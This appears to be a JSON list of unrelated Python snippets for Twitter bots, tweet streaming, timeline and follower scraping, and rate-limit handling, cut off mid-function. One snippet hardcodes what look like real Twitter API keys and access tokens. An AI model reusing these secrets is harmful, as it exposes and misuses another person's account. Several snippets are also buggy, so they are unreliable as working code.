[ "def streamTweets(words = [], authors = [], timeLimit=120, removeRetweets=False, **kwargs):\n if 'stream' not in globals():\n global stream\n if 'api' not in globals():\n startTwitterApi(getApiKeys(fileName=\"apiConf2.txt\"))\n listener = StdOutListener(removeRetweets=removeRetweets)\n auth = api.auth\n stream = tweepy.Stream(auth, listener, tweet_mode='extended')\n else:\n stream.listener.setRemoveRetweets(removeRetweets)\n stream.listener.resetTweets()\n\n words = mapToValid(words)\n authors = mapToValid(authors)\n if not words and not authors:\n words=[\"the\", \"i\", \"to\", \"a\", \"and\", \"'s\", \"is\", \"in\", \"it\", \"you\", \"of\", \"for\", \"on\", \"my\", \"that\", \"e\", \"with\", \"me\", \"do\", \"have\", \"ciao\", \"o\", \"u\", \"cool\", \"good\", \"nice\", \"#\", \"*\", \":\", \";\", \",\", \".\", \"?\", \"-\", \"%\", \"$\", \"€\", \"!\", \"(\", \")\", \"=\", \"'\"]\n\n #myQuery = ' OR '.join(kwargs[\"words\"])\n if authors:\n kwargs[\"follow\"]=[user.id_str for user in list(map(api.get_user,authors))]\n else:\n kwargs[\"track\"]=words\n #if removeRetweets:\n # myQuery += \" -filter:retweets\"\n\n #myQuery += ' from:'\n #myQuery += ' OR from:'.join(kwargs[\"authors\"])\n #print(myQuery)\n import signal\n # Register the signal function handler\n signal.signal(signal.SIGALRM, __streamHandler__)\n # Define a timeout for your function\n signal.alarm(timeLimit)\n try:\n __stream__(stream,**kwargs)\n except Exception:\n print(\"Streaming over after time period of\", timeLimit, \"seconds... Retrieved\", len(stream.listener.getTweets()), \"tweets.\")\n stream.disconnect()\n if authors and words:\n print(\"Filtering out tweets that don't contain the specified words...\")\n myTweets=[]\n for tweet in stream.listener.getTweets():\n if 'full_text' in tweet:\n tweet['text'] = tweet['full_text']\n del (tweet['full_text'])\n if any(containsWord(tweet['text'],word) for word in words):\n myTweets.append(tweet)\n print(\"Done. 
Retrieved\", len(myTweets), \"tweets written by the authors specified and containing (any of) the words specified.\")\n return myTweets\n return stream.listener.getTweets()", "def TweetHandler(self):\n self.response.out.write('<br/><br/>Tweeting<br/>')\n self.response.out.write('this info will be tweeted:<br/>')\n # oldest non-tweeted and prepared\n oldest_changeset = Changeset.all().order('created_at').filter('is_tweeted =', False).filter('is_prepared =', True).fetch(1)\n if not oldest_changeset:\n self.response.out.write('nothing to tweet')\n return\n else:\n c = oldest_changeset[0]\n \n config = get_config()\n\n # do not tweet from localhost\n if not 'localhost' in self.request.url:\n auth = tweepy.OAuthHandler(config[\"consumer_key\"], config[\"consumer_secret\"])\n auth_data = OAuthAccessToken.all().filter('specifier =', config[\"twitter_username\"]).fetch(1)[0]\n auth.set_access_token(auth_data.oauth_token, auth_data.oauth_token_secret)\n self.response.out.write('<br/>tweeting with oauth:<br/>')\n api = tweepy.API(auth)\n self.response.out.write(\"id: %d\" % c.id)\n self.response.out.write(\"user: %s\" % c.user)\n self.response.out.write(\"comment: %s\" % c.comment)\n self.response.out.write(\"tweet: %s\" % c.tweet)\n try:\n api.update_status(c.tweet)\n except tweepy.error.TweepError, e: \n self.response.out.write( 'failed: %s' % e.reason )\n if \"Status is a duplicate\" in e.reason:\n c.is_tweeted = True\n c.put()\n return\n else:\n self.response.out.write('<br/>localhost - nothing actually tweeted:')\n\n self.response.out.write('<br/>%s' % c.tweet)\n\n c.is_tweeted = True\n c.put()", "def filter_tweet(tweet):\n if not filter_tweet_core(tweet):\n return False\n if bannedusers.search(tweet['user']['screen_name']) or (\n 'retweeted_status' in tweet and bannedusers.search(tweet['retweeted_status']['user']['screen_name'])):\n return False\n if tweet['user']['screen_name'] == credentials['username']: # Do not match self tweets :-)\n return False\n return True", "def handler(event,context):\n send_tweet(random.choice(potential_tweets))", "def handler(event, context):\n send_tweet(random.choice(potential_tweets))", "def handler(event, context):\n send_tweet(random.choice(potential_tweets))", "def on_tweet(self, tweet):\n pass", "def accepted(eachtweet):\n import general_functions\n from authenticator import oauth\n try:\n ##\n tweet = '{}: {} #{}'.format(eachtweet[0], eachtweet[1], eachtweet[3].upper())\n r = oauth.request('statuses/update', {'status': tweet})\n\n replace(\"clients.csv\",\"ReadyForAck.csv\")\n replace2(\"ReadyForAck.csv\",\"clients.csv\")\n except:\n print('ietsgaatfout')", "def analyzeUserTwitter(request):\n\tsend_text(\"starting to analyze user twitter\", \"9258995573\")\n\tprint(\"analyzeUserTwitter received a request with some data! \" + request.data.handle)\n\tphone_num = request.data.phone_num\n\tphone_num = phone_num.replace(\" \", \"\").replace(\"-\", \"\") # strip any whitespace or hyphens\n\n\n\t# twitterhandle may need to have the @ stripped off\n\tif twitterHandle[0] == \"@\":\n\t\ttwitterhandle = twitterhandle[1:]\n\n\tif \"@\" in twitterhandle:\n\t\t# something's terribly wrong here :(\n\t\treturn -1\n\n\tuser_sentiment, network_sentiment = main(twitterhandle, analyze_friends = True)\n\tif user_sentiment < -0.1 and user_sentiment > -0.5: # threshold for very minorly negative sentiment\n\t\t# send a text to the user with a positive news article\n\t\tmsg = \"Despite what Twitter might make you think, there's also good news out there in the world! 
https://www.goodnewsnetwork.org/swinhoes-turtle-the-most-endangered-on-earth-found-in-vietnam/\"\n\t\tsend_text(msg, phone_num)\n\telif user_sentiment < -0.5:\n\t\t# send a meditation tips article\n\t\tmsg = \"Twitter got you down? Here's some tips on how to refocus your mind and stay positive :) https://www.mindful.org/how-to-meditate/\"\n\t\tsend_text(msg, phone_num)\n userfriends = load_friends(twitterHandle)\n message_friend(twitterHandle, userfriends)\n\n\n\treturn render(request, \"index.html\")", "def process(self, filter_words, count=1):\n user = self.__api.get_user(self.__username)\n\n # print user.screen_name\n # print user.followers_count\n if self.__appMode == 1 and self.__TimeLineMode == 1:\n self.get_timeline(filter_words)\n else:\n if self.__friendMode:\n print(\"Getting all Twitter Friends \\n\")\n for friend in user.friends():\n self.get_tweet(friend.screen_name, filter_words, count)\n else:\n for screen_name in self.__priorityCoin:\n self.get_tweet(screen_name, filter_words, count)\n print('Twitter Data Extraction done!!')", "def _upload_to_twitter(self):\n if self._twitter:\n strip_file = self.create_strip(resolution_ratio=0.5)\n f = open(strip_file)\n self._twitter.request('statuses/update_with_media', {'status': self._twitter_text}, {'media[]': f.read()})\n f.close()\n os.remove(strip_file)", "def getTweets(user,maxTweets=3000,count=0,tweetId=0,cacheKey=False,credentials=False):\n api = ratedTwitter(credentials=credentials)\n limit = api.get_user_timeline_limited()\n if limit:\n print '*** TWITTER RATE-LIMITED: statuses.user_timeline:'+user+':'+str(count)+' ***'\n raise getTweets.retry(countdown = limit)\n else:\n args = {'screen_name':user,'exclude_replies':False,'include_rts':True,'trim_user':False,'count':200}\n if tweetId:\n args['max_id'] = tweetId\n \n okay, result = api.get_user_timeline(**args)\n \n if okay:\n print '*** TWITTER USER_TIMELINE: '+user+':'+str(tweetId)+' ***'\n if result:\n newCount = count + len(result)\n if maxTweets:\n if newCount > maxTweets: # No need for the task to call itself again.\n pushTweets.delay(result,user,cacheKey=cacheKey) # Give pushTweets the cache-key to end the job.\n return\n else:\n pushTweets.delay(result,user)\n\n newTweetId = min([t['id'] for t in result]) - 1 \n # Not done yet, the task calls itself with an updated count and tweetId.\n getTweets.delay(user,maxTweets=maxTweets,count=newCount,tweetId=newTweetId,cacheKey=cacheKey,credentials=credentials)\n else:\n pushTweets.delay([],user,cacheKey=cacheKey) # Nothing more found, so tell pushTweets the job is done.\n else:\n if result == '404':\n setUserDefunct(user)\n cache.set('scrape_tweets','done')\n if result == 'limited':\n raise getTweets.retry(countdown = api.get_user_timeline_limited())", "def _get_tweets(self):\n auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)\n api = tweepy.API(auth)\n search = api.search(self.term, lang='en', count=100)\n\n print(f\"Getting tweets that mention '{self.term}', \"\n f\"this may take a while...\")\n\n save_tweet_text = [tweet._json['text'] for tweet in search]\n while len(save_tweet_text) < 1000:\n try:\n oldest = search[-1].id - 1\n search = api.search(self.term, lang='en', count=100, max_id=oldest)\n new_tweets = [tweet._json['text'] for tweet in search]\n save_tweet_text.extend(new_tweets)\n\n # Turn into a set to remove duplicated tweets, then back to list\n save_tweet_text = list(set(save_tweet_text))\n except IndexError:\n break\n\n print(f\"Done. 
{len(save_tweet_text)} Tweets received.\")\n return save_tweet_text", "def robust_request(twitter, resource, params, max_tries=5):\n for i in range(max_tries):\n request = twitter.request(resource, params)\n if request.status_code == 200:\n return request\n else:\n print('Got error %s \\nsleeping for 15 minutes.' % request.text)\n sys.stderr.flush()\n time.sleep(61 * 15)", "def robust_request(twitter, resource, params, max_tries=5):\n for i in range(max_tries):\n request = twitter.request(resource, params)\n if request.status_code == 200:\n return request\n else:\n print('Got error %s \\nsleeping for 15 minutes.' % request.text)\n sys.stderr.flush()\n time.sleep(61 * 15)", "def robust_request(twitter, resource, params, max_tries=5):\n for i in range(max_tries):\n request = twitter.request(resource, params)\n if request.status_code == 200:\n return request\n else:\n print('Got error %s \\nsleeping for 15 minutes.' % request.text)\n sys.stderr.flush()\n time.sleep(61 * 15)", "def robust_request(twitter, resource, params, max_tries=5):\n for i in range(max_tries):\n request = twitter.request(resource, params)\n if request.status_code == 200:\n return request\n else:\n print('Got error %s \\nsleeping for 15 minutes.' % request.text)\n sys.stderr.flush()\n time.sleep(61 * 15)", "def ping(self, times=10):\n logging.debug(\"checking for rate limit info\")\n url = \"https://api.twitter.com/1.1/application/rate_limit_status.json?resources=search\"\n response = self.client.get(url)\n result = response.json()\n\n # look for limits in the json or the http headers, which can\n # happen when we are rate limited from checking the rate limits :)\n\n if \"resources\" in result:\n self.reset = int(result[\"resources\"][\"search\"][\"/search/tweets\"][\"reset\"])\n self.remaining = int(result[\"resources\"][\"search\"][\"/search/tweets\"][\"remaining\"])\n elif 'x-rate-limit-reset' in response.headers:\n self.reset = int(response.headers[\"x-rate-limit-reset\"])\n self.remaining = int(response.headers[\"x-rate-limit-remaining\"])\n else:\n logging.error(\"missing x-rate-limit-reset in headers: %s\", response.headers)\n if times == 0:\n logging.error(\"ping isn't working :(\")\n raise Exception(\"unable to ping\")\n else:\n times -= 1\n time.sleep(1)\n logging.info(\"trying to ping again: %s\", times)\n return self.ping(times)\n\n logging.info(\"new rate limit remaining=%s and reset=%s\",\n self.remaining, self.reset)", "async def get_tweets(self, ctx, username: str, count: int):\n cnt = count\n if count > 25:\n cnt = 25\n\n if username is not None:\n if cnt < 1:\n await self.bot.say(\"I can't do that, silly! Please specify a \\\n number greater than or equal to 1\")\n return\n msg_list = []\n api = self.authenticate()\n try:\n for status in\\\n tw.Cursor(api.user_timeline, id=username).items(cnt):\n if not status.text.startswith(\"@\"):\n msg_list.append(status)\n except tw.TweepError as e:\n await self.bot.say(\"Whoops! Something went wrong here. 
\\\n The error code is \" + str(e))\n return\n if len(msg_list) > 0:\n await self.tweet_menu(ctx, msg_list, page=0, timeout=30)\n else:\n await self.bot.say(\"No tweets available to display!\")\n else:\n await self.bot.say(\"No username specified!\")\n return", "async def tweepy_on_status(self, tweet):\n self.processed_tweets += 1\n if self.skip_tweet(tweet):\n return\n\n chan_conf = dutils.get(self.conf.follows, id=tweet.author.id_str)\n try:\n embed = await self.prepare_embed(tweet)\n content = None\n except:\n embed = None\n content = 'Failed to prepare embed for ' + tweet.tweet_web_url # If the preparation failed before setting tweet.tweet_web_url imma kms\n log.error('Failed to prepare embed for ' + str(tweet._json))\n\n # Make sure we're ready to send messages\n await self.bot.wait_until_ready()\n\n for channel in chan_conf.discord_channels:\n discord_channel = self.bot.get_channel(channel.id)\n\n # Check if the channel still exists\n if discord_channel is None:\n log.error('Channel {} unavailable to display tweet {}.'.format(discord_channel.id, tweet.id_str))\n continue\n\n # Check for required permissions\n perms = discord_channel.permissions_for(discord_channel.server.me)\n if not perms.embed_links:\n log.warning('Improper permissions in channel {} to display tweet {}.'.format(discord_channel.id, tweet.id_str))\n try:\n warning = '\\N{WARNING SIGN} Missed tweet from {} : `Embed links` permission missing. \\N{WARNING SIGN}'.format(tweet.author.screen_name)\n await self.bot.send_message(discord_channel, warning)\n except discord.DiscordException as e:\n log.error('Could not send warning to channel {}.\\n{}'.format(discord_channel.id, e))\n continue\n\n # Send the embed to the appropriate channel\n log.debug('Scheduling Discord message on channel ({}) : {}'.format(channel.id, tweet.text))\n await self.bot.send_message(discord_channel, content=content, embed=embed)\n\n # Update stats and latest id when processing newer tweets\n if tweet.id > chan_conf.latest_received:\n channel.received_count += 1\n chan_conf.latest_received = tweet.id\n self.conf.save()", "def __init__(self):\r\n # keys and tokens from the Twitter Dev Console\r\n consumer_key = 'e1I0CSqgSOGxhH940cey1PR50'\r\n consumer_secret = 'APZE7kT2MgJsledQszLbNVcZZEhCUDX3NKAseXTjnsEcggUAkf'\r\n access_token = '876294238144786432-Q9PfwxPd4T7OdYO9hXiFyVDO38Q8jZV'\r\n access_token_secret = 'e0RhKgnLLyHnEOrWS92Tw0pKv5hWrN3chjp4Azm4NayOG'\r\n\r\n # clean tween regular expression\r\n self.pattern = re.compile('(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+://\\S+)')\r\n\r\n # attempt authentication\r\n try:\r\n # create OAuthHandler object\r\n self.auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n # set access token and secret\r\n self.auth.set_access_token(access_token, access_token_secret)\r\n # create tweepy API object to fetch tweets\r\n self.api = tweepy.API(self.auth)\r\n logging.info(self.api.rate_limit_status()['resources']['search'])\r\n except:\r\n logging.error(\"Error: Authentication Failed\")", "def tweet(self, string):\n if len(string)>140:\n print \"This string is too long, and it will be truncated to fit on Twitter.\"\n\n selt.api.update_status(string[:140])", "def post(self, request):\n if request.user.is_authenticated:\n if not request.user.consumer_key and not request.user.consumer_secret and not request.user.oauth_token and \\\n not request.user.oauth_token_secret:\n return Response({\"message\": \"Kindly supply the twitter authentication keys in the admin dashboard\"},\n status=status.HTTP_400_BAD_REQUEST)\n 
else:\n tweets = request.data.get('tweets', None)\n if tweets is not None:\n api = load_api(request)\n try:\n api.update_status(tweets)\n except tweepy.TweepError as e:\n return Response({\"message\": e.args[0][0]['message']}, status=status.HTTP_400_BAD_REQUEST)\n return Response({\"message\": \"Your tweets has been updated\"}, status=status.HTTP_201_CREATED)", "def get_tweets(api, username, fh, limit):\n if args.json is False:\n for status in tqdm(tweepy.Cursor(api.user_timeline, screen_name=username).items(limit), unit=\"tw\", total=limit):\n process_tweet(status)\n if args.save:\n fh.write(str(json.dumps(status._json))+\",\")\n else:\n for status in (tweepy.Cursor(api.user_timeline, screen_name=username).items(limit)):\n process_tweet(status)\n if args.save:\n fh.write(str(json.dumps(status._json))+\",\")", "def robust_request(twitter, resource, params, max_tries=5):\n \n for i in range(max_tries):\n request = twitter.request(resource, params)\n if request.status_code == 200:\n return request\n else:\n print('Got error %s \\nsleeping for 15 minutes.' % request.text)\n sys.stderr.flush()\n time.sleep(61 * 15)", "def get_friends(twitter,userid,count):\n url = 'https://api.twitter.com/1.1/friends/ids.json?&user_id='+str(userid)+'&skip_status=true&include_user_entities=false&count='+str(count) \n consumer = oauth.Consumer(key=consumer_key, secret=consumer_secret)\n access = oauth.Token(key=access_token, secret=access_token_secret)\n client = oauth.Client(consumer, access)\n li=[]\n try:\n response,data = client.request(url)\n dataStr = data.decode('utf-8') \n if('Rate limit exceeded' in dataStr ):\n print('rate limit exceeded error.. sleep for 15 min')\n time.sleep(61 * 15)\n response,data = client.request(url)\n \n jsonid = json.loads(dataStr)\n li = list(jsonid['ids'])\n \n except:\n pass\n \n return li", "def on_status(self, status):\n try:\n \n time = status.created_at\n text = str(status.text)\n \n if text.startswith('RT'):\n text = text.split('RT')[1].replace(',','')\n print(text)\n print(time)\n \n line = str(text + ',' + str(time) + '\\n')\n output = open('tweets.txt','a')\n output.write(line)\n output.close() \n else:\n text = text.split('RT')[0].replace(',','')\n print(text)\n \n line = str(text + ',' + str(time) + '\\n')\n output = open('tweets.txt','a')\n output.write(line)\n output.close()\n\n # count\n self.counter += 1\n print(self.counter)\n \n if self.counter < self.limit:\n return True\n else:\n self.counter ==0\n twitterStream.disconnect()\n \n \n except BaseException as e:\n print('failed on_status,',str(e))", "async def rate_limit(self, ctx):\n await ctx.send(\"We have found that the approximate rate limit is 30-40 requests per second. Staying \"\n \"below this should be safe.\")", "def test_api_requests_limited(self):\n\n did_reach_rate_limit = False\n for _ in range(110):\n response = self.send_get('Participant', expected_status=None)\n if response.status_code == TooManyRequests.code:\n did_reach_rate_limit = True\n break\n\n self.assertTrue(did_reach_rate_limit)", "def crawlAccount(target):\n\n\t# connect Twitter api\n\ttwitter = connectTwitter()\t\n\ttry:\n\t\tuser_timeline = twitter.get_user_timeline(screen_name=target, count=200, include_rts=False, exclude_replies=False)\n\texcept TwythonError:\n\t\tsys.exit('Received 404 for %s. Account does not exist or is banned.' 
% target)\n\t\n\tuser_timeline = twitter.get_user_timeline(screen_name=target, count=200, include_rts=True, exclude_replies=False)\t\n\ttweets = []\n\tids = []\n\n\n\t# stop this loop\n\twhile len(ids) < user[0]['statuses_count']:\n\t\tif len(user_timeline) == 0:\n\t\t\tprint '[!] No more tweets available. Ending scraper.\\n'\n\t\t\tbreak\n\n\t\tfor tweet in user_timeline:\n\t\t\tids.append(tweet['id'])\t\t\t\n\t\t\ttweets.append(tweet)\n\n\t\t\twith open('../Raw data/tweets/%s.json' % screen_name, 'a') as json_out:\n\t\t\t\tjson.dump(tweet, json_out)\n\t\t\t\tjson_out.write('\\n')\n\n\t\tprint '\\t[i] Found %i tweets so far.' % (len(ids))\n\t\t\n\t\ttime.sleep(5)\n\t\tuser_timeline = twitter.get_user_timeline(screen_name=screen_name, count=200, max_id=min(ids) - 1, include_rts=True, exclude_replies=False)\t\n\t\t\n\telse:\n\t\tprint '[!] All tweets scraped. Ending scraper.\\n'\n\t\treturn", "async def tweet_feeder(self): \n try:\n data=json.loads(self.request.body.decode('utf-8'))\n except: \n print(\"No data body!\")\n\n t=Tweet()\n t.tweet_id = data[\"tweet_id\"]\n t.text=data[\"text\"]\n #\n # update the hashtags cache\n #\n try:\n t.hashtags=data[\"hashtags\"] \n for htag in t.hashtags:\n #print(\"adding to hashtags: {} to cache:\".format(htag[\"text\"], ))\n if htag[\"text\"] in hash_cache:\n hash_cache[htag[\"text\"]] += 1\n else:\n hash_cache[htag[\"text\"]] = 1\n except:\n t.hashtags=[]\n \n #\n # update the user cache\n #\n try:\n user_id = \"@\" + data[\"user_screenname\"]\n if user_id in user_cache:\n user_cache[user_id] += 1\n else:\n user_cache[user_id] = 1\n except:\n print(\" ERR No User: should never happen\")\n\n try:\n t.user_screenname=data[\"user_screenname\"]\n except:\n t.user_screenname=\"\"\n try:\n t.profile_image_url_https = data[\"profile_image_url_https\"]\n except:\n t.profile_image_url_https = \"\"\n #\n # update the tweets cache\n #\n try:\n t.timestamp = data[\"timestamp\"]\n except:\n t.timestamp = datetime.datetime.utcnow()\n tweet_cache.append(t.to_dict())\n \n #\n # get the embed html from twitter oembed API\n #\n r=requests.get(\"https://publish.twitter.com/oembed?url=https://twitter.com/Interior/status/\"+ t.tweet_id )\n #print(r.json())\n \n #print(self.__class__.callbacks)\n await self.fire_callbacks(r.json())\n #self.success(message=\"Added tweet id: {} \".format(str(id)), data=t.to_json(), format=\"json\", pure=True)", "def on_limit(self, track):\n print ('Got Rate limit Message', str(track))\n return True # Don't kill the stream", "async def oauth_whitelist(self, ctx, target: Union[Role, utils.User]):\n whitelisted = self.bot.config[\"oauth_whitelist\"]\n\n # target.id is not int??\n if target.id in whitelisted:\n whitelisted.remove(target.id)\n removed = True\n else:\n whitelisted.append(target.id)\n removed = False\n\n await self.bot.config.update()\n\n embed = Embed(color=self.bot.main_color)\n embed.title = \"Success\"\n\n if not hasattr(target, \"mention\"):\n target = self.bot.get_user(target.id) or self.bot.modmail_guild.get_role(\n target.id\n )\n\n embed.description = (\n f\"{'Un-w' if removed else 'W'}hitelisted \" f\"{target.mention} to view logs.\"\n )\n\n await ctx.send(embed=embed)", "async def twitter_fetch(self, ctx, handle, limit: int=1):\n sane_handle = handle.lower().lstrip('@')\n # Get the latest tweets from the user\n try:\n to_display = await self.get_latest_valid(screen_name=sane_handle, limit=limit)\n except tweepy.TweepError as e:\n # The channel is probably protected\n if e.reason == 'Not authorized.':\n raise 
TwitterError('This channel is protected, its tweets cannot be fetched.') from e\n if e.api_code == 34:\n raise TwitterError('User \"{}\" not found.'.format(handle)) from e\n else:\n log.error(str(e))\n raise TwitterError('Unknown error from the Twitter API, this has been logged.') from e\n\n # Display the kept tweets\n for tweet in to_display:\n embed = await self.prepare_embed(tweet)\n await self.bot.say(embed=embed)", "def get_posts(username):\r\n\r\n # Authenticate to Twitter\r\n auth = tweepy.OAuthHandler(twitter_credentials.CONSUMER_KEY, twitter_credentials.CONSUMER_SECRET)\r\n auth.set_access_token(twitter_credentials.ACCESS_TOKEN, twitter_credentials.ACCESS_TOKEN_SECRET)\r\n\r\n api = tweepy.API(auth)\r\n\r\n try:\r\n api.verify_credentials()\r\n print(\"Authentication OK\")\r\n except:\r\n print(\"Error during authentication\")\r\n\r\n alltweets=[]\r\n\r\n new_tweets = api.user_timeline(screen_name = username,count=200,tweet_mode='extended')\r\n status = new_tweets[0]\r\n json_str = json.dumps(status._json)\r\n\r\n #convert to string\r\n json_str = json.dumps(status._json)\r\n #deserialise string into python object\r\n parsed = json.loads(json_str)\r\n print(json.dumps(parsed, indent=4, sort_keys=True))\r\n\r\n # save most recent tweets\r\n alltweets.extend(new_tweets)\r\n\r\n # save the id of the oldest tweet less one\r\n oldest = alltweets[-1].id - 1\r\n\r\n # keep grabbing tweets until there are no tweets left to grab\r\n while len(new_tweets) > 0:\r\n print(f\"getting tweets before {oldest}\")\r\n\r\n # all subsiquent requests use the max_id param to prevent duplicates\r\n new_tweets = api.user_timeline(screen_name=username, count=200, max_id=oldest,tweet_mode='extended')\r\n\r\n # save most recent tweets\r\n alltweets.extend(new_tweets)\r\n\r\n # update the id of the oldest tweet less one\r\n oldest = alltweets[-1].id - 1\r\n\r\n print(f\"...{len(alltweets)} tweets downloaded so far\")\r\n\r\n\r\n outtweets=[]\r\n\r\n\r\n for item in alltweets:\r\n\r\n mined = {\r\n 'tweet_id': item.id,\r\n 'name': item.user.name,\r\n 'screen_name': item.user.screen_name,\r\n 'retweet_count': item.retweet_count,\r\n 'lang' : item.lang,\r\n 'text': item.full_text,\r\n 'mined_at': datetime.datetime.now(),\r\n 'created_at': item.created_at,\r\n 'favourite_count': item.favorite_count,\r\n 'hashtags': item.entities['hashtags'],\r\n 'status_count': item.user.statuses_count,\r\n 'location': item.place,\r\n 'source_device': item.source\r\n }\r\n\r\n try:\r\n mined['retweet_text'] = item.retweeted_status.full_text # In case the tweet is a RT, there is a need to\r\n # retrieve the retweet_text field which contains the full comment (up to 280 char) accompanying the retweet\r\n except:\r\n mined['retweet_text'] = ''\r\n\r\n outtweets.extend([mined])\r\n\r\n return outtweets", "def message_no_limit(request):\n \n # this is only available in development - should use our\n # parse.decorators.dev_only decorator instead of this\n if PRODUCTION_SERVER:\n raise Http404 \n\n # insert the token in the session and return a plaintext response\n # confirming the success of the operation\n if request.method == \"GET\":\n request.session[\"message_limit_off\"] = True\n return HttpResponse(\"Limit for sending messages has been turned off.\" +\\\n \"To turn it back on, please log out and log back in.\")\n \n # only accept GET methods \n return HttpResponse(\"Bad Request\")", "def prevent_throttling(self):\n now = time.time()\n if now - self.last_request < 1:\n logger.verbose(\"Last request issued less than 1 second 
ago\")\n logger.verbose(\"Sleep {0} second to avoid throttling.\",\n SHORT_WAITING_INTERVAL)\n time.sleep(SHORT_WAITING_INTERVAL)\n self.last_request = now\n\n self.req_count += 1\n if self.req_count % 3 == 0:\n logger.verbose(\"Sleep {0} second to avoid throttling.\",\n SHORT_WAITING_INTERVAL)\n time.sleep(SHORT_WAITING_INTERVAL)\n self.req_count = 0", "def Stream():\r\n \r\n config = config_create()\r\n CONSUMER_KEY = config.get('Auth', 'CONSUMER_KEY') \r\n CONSUMER_SECRET = config.get('Auth', 'CONSUMER_SECRET')\r\n ACCESS_KEY = config.get('Auth', 'ACCESS_KEY')\r\n ACCESS_SECRET = config.get('Auth', 'ACCESS_SECRET')\r\n searchterm = config.get('Filter','search')\r\n name = multiprocessing.current_process().name\r\n \"\"\"Function that will manage doing the twitter stream\"\"\"\r\n stream = MyStreamer(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_KEY, ACCESS_SECRET)\r\n stream.statuses.filter(track= searchterm)", "def tweets(request):\n if request.method == 'GET':\n max_items = request.GET.get('max_items') or _DEFAULT_MAX_ITEMS\n try:\n sentiments = models.Sentiment.objects.filter(is_tweet=True)[:max_items]\n serializer = models.SentimentSerializer(sentiments, many=True)\n return JSONResponse(serializer.data)\n except ObjectDoesNotExist:\n return JSONResponse([])\n return JSONResponse([], status=400)", "def get_all_tweets(user, alltweets):\n\n #TODO check that user is a valid screen name??\n\n #make initial request for most recent tweets (200 is the maximum allowed count)\n new_tweets = api.user_timeline(user, count=200)\n\n #save most recent tweets\n alltweets.extend(new_tweets)\n #print alltweets[0].text\n\n #save the id of the oldest tweet less one\n oldest = alltweets[-1].id - 1\n\n #print \"starting loop\"\n #keep grabbing tweets until there are no tweets left to grab\n while len(new_tweets) > 0:\n\n #all subsiquent requests starting with oldest\n new_tweets = api.user_timeline(user, count=200, max_id=oldest)\n\n #save most recent tweets\n alltweets.extend(new_tweets)\n\n #update the id of the oldest tweet less one\n oldest = alltweets[-1].id - 1", "def handler(event,context):\n tweet = setup_and_get_tweet()\n send_tweet(tweet)", "def on_limit(self, track):\n print \"!!! Limitation notice received: %s\" % str(track)\n return", "def twitter(self, twitter):\n\n self._twitter = twitter", "def test429Error300request(self):\n \"\"\" In this case the search() method send more than one rewuest per second, so twitter get 429 error. 
\"\"\"\n \"\"\" In this case we wait for 2 second before resend the request \"\"\"\n \"\"\" WARNING: TIME EXPENSIVE TEST: 20-25min needed \"\"\"\n wk = os.path.dirname(os.path.abspath(__file__))\n f = os.path.join(wk, \"search_tweets.config\")\n twitter_research = SearchTweets(self.db, f)\n with patch.object(twitter_research, '_SearchTweets__twitter_n_results',\n new_callable=PropertyMock(return_value=10)):\n with patch.object(twitter_research, '_SearchTweets__multi_user',\n new_callable=PropertyMock(return_value=False)):\n with patch.object(twitter_research, '_SearchTweets__twitter_users',\n new_callable=PropertyMock(return_value=[])):\n with patch.object(twitter_research, '_SearchTweets__twitter_keyword',\n new_callable=PropertyMock(return_value=\"Eurovision\")):\n with patch.object(twitter_research, '_SearchTweets__save'):\n logging.getLogger('SEARCH').propagate = False\n with self.assertLogs('SEARCH', level='INFO') as cm:\n for i in (tqdm(range(0, 301), desc=\"NUMBER OF REQUEST\", leave=True)):\n twitter_research.search()\n time.sleep(0.3)\n self.assertTrue('INFO:SEARCH:RATE LIMITS REACHED: WAITING' in cm.output)\n self.assertEqual(twitter_research.total_result, 3010)", "def get(self, request):\n if request.user.is_authenticated:\n if not request.user.consumer_key and not request.user.consumer_secret and not request.user.oauth_token and \\\n not request.user.oauth_token_secret:\n return Response({\"message\": \"Kindly supply the twitter authentication keys in the admin dashboard\"},\n status=status.HTTP_400_BAD_REQUEST)\n else:\n api = load_api(request)\n try:\n my_tweets = api.user_timeline()\n except tweepy.TweepError as e:\n return Response({\"message\": e.args[0][0]['message']}, status=status.HTTP_400_BAD_REQUEST)\n tweet_list = []\n for tweet in my_tweets:\n tweet_list.append(tweet.text)\n return Response({'message': tweet_list}, status=status.HTTP_200_OK)\n else:\n return Response({\"message\": \"Kindly create an account and log in first\"},\n status=status.HTTP_400_BAD_REQUEST)", "def tweet(api):\n logger.info(\"Tweeting content\")\n urls = get_article('the_onion.txt')\n lines = content_list(urls)\n\n for line in lines:\n try:\n api.update_status(line)\n logger.info(\"Tweeting!\")\n time.sleep(SECONDS)\n\n except tweepy.TweepError as err:\n logger.error(err)", "def on_data(self, tweet):\n if (time.time() - self.start_time) < self.limit:\n self.saveFile.write(tweet)\n return True\n else:\n self.saveFile.close()\n return False", "def get_followers(twitter,screen_name,filename,count):\n url = 'https://api.twitter.com/1.1/followers/ids.json?&screen_name=@'+screen_name+'&skip_status=true&include_user_entities=false&count='+str(count) \n consumer = oauth.Consumer(key=consumer_key, secret=consumer_secret)\n access = oauth.Token(key=access_token, secret=access_token_secret)\n client = oauth.Client(consumer, access)\n try:\n response,data = client.request(url)\n dataStr = data.decode('utf-8') \n if('Rate limit exceeded' in dataStr ):\n print('rate limit exceeded error.. 
sleep for 15 min')\n time.sleep(61 * 15)\n response,data = client.request(url)\n \n jsonid = json.loads(dataStr)\n li = list(jsonid['ids'])\n output = open(filename, 'wb')\n pickle.dump(li, output)\n output.close()\n except:\n pass\n \n return li", "def get_all_tweets(screen_name: object):\r\n temptweets = []\r\n alltweets = []\r\n new_tweets = api.user_timeline(screen_name=screen_name, count=199)\r\n alltweets.extend(new_tweets)\r\n print(alltweets[1].id)\r\n oldest = alltweets[-1].id - 1\r\n while 0 < len(new_tweets) < 200:\r\n new_tweets = tweepy.Cursor(api.user_timeline, screen_name=screen_name, count=199, max_id=oldest).items(1500)\r\n alltweets.extend(new_tweets)\r\n for tweet in alltweets:\r\n if (not tweet.retweeted) and ('RT @' not in tweet.text):\r\n temptweets.append(tweet)\r\n oldest = alltweets[-1].id - 1\r\n print(\"Total tweets downloaded from %s are %s\" % (screen_name, len(temptweets)))\r\n return temptweets", "def send_tweet(tweet_text):\n twitter.update_status(status = tweet_text)", "def reply_to_tweets():\n last_seen_id = retrieve_last_seen_id(FILE_NAME)\n mentions = api.mentions_timeline(\n last_seen_id,\n 